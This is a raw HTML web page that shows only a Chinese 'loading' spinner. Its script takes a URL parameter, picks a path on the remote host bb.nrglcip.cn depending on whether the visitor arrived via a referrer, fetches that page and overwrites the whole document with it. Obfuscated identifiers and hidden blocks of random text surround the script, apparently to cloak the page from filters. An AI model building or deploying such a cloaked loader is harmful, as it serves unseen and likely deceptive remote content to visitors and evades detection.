<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .erDXoSJ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .erDXoSJ .R8dgT4ufve {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .erDXoSJ .content {
            line-height: 50px;
            text-align: center
        }

        .erDXoSJ .img {
            width: 100%
        }

        .erDXoSJ .KrV8ju {
            text-align: center
        }

        .erDXoSJ .KrV8ju span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .erDXoSJ .KrV8ju span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .erDXoSJ .KrV8ju span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .erDXoSJ .KrV8ju span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .erDXoSJ .KrV8ju span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .erDXoSJ .KrV8ju span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .erDXoSJ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function vOUFdbn25zWc7(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var CKHdvPH = vOUFdbn25zWc7('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ CKHdvPH +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ CKHdvPH +".html?a=share";
		}
		
        LLukslWn6=url+"#"+new Date().getTime();
        LLukslWn6 && function() {
            $.get(LLukslWn6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>yJloLq4CeYSfGbUQKvCLk5qOg3BK6wRZKt5P5ftmKCMY5uB94kRYn5bTVi6kbshdYLkt2EeWrqbJDQcvXrodHA</p>
<img  src='' style='display:none'>
<b style='display:none' >tAFTWbrw3nznXN</b><div class="erDXoSJ">
    <div class="R8dgT4ufve">
        <div class="KrV8ju">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>oMKQh8CU21lZ8WoP7OrXyH4tHJXYykmtnfUMm9Jk3R41XXQrtDpcd0P4ZoORJANiA5DMmprnkfvD</a>
<li style='display:none' >d2a9GvcB5hXhXiOUymHEuhWsfd8uz6ZbrmWrOikgWuaCntxGgVFtl6MuwBaZdWpBMYuJwcyoUYmnZJLz0RBBrMTSF2jgGv7Nd</li>
<li style='display:none' >d2a9GvcB5hXhXiOUymHEuhWsfd8uz6ZbrmWrOikgWuaCntxGgVFtl6MuwBaZdWpBMYuJwcyoUYmnZJLz0RBBrMTSF2jgGv7Nd</li>
<b style='display:none' >iVUkrAjNIsKOSRyTsji6cjMa5yCFXD4lzm3DsAFBvCCbbIOyn6GXmdzEYTR08ufPJJCGwhY22nT4qLKnqadeeu1MXT6F061b</b></body>
</html>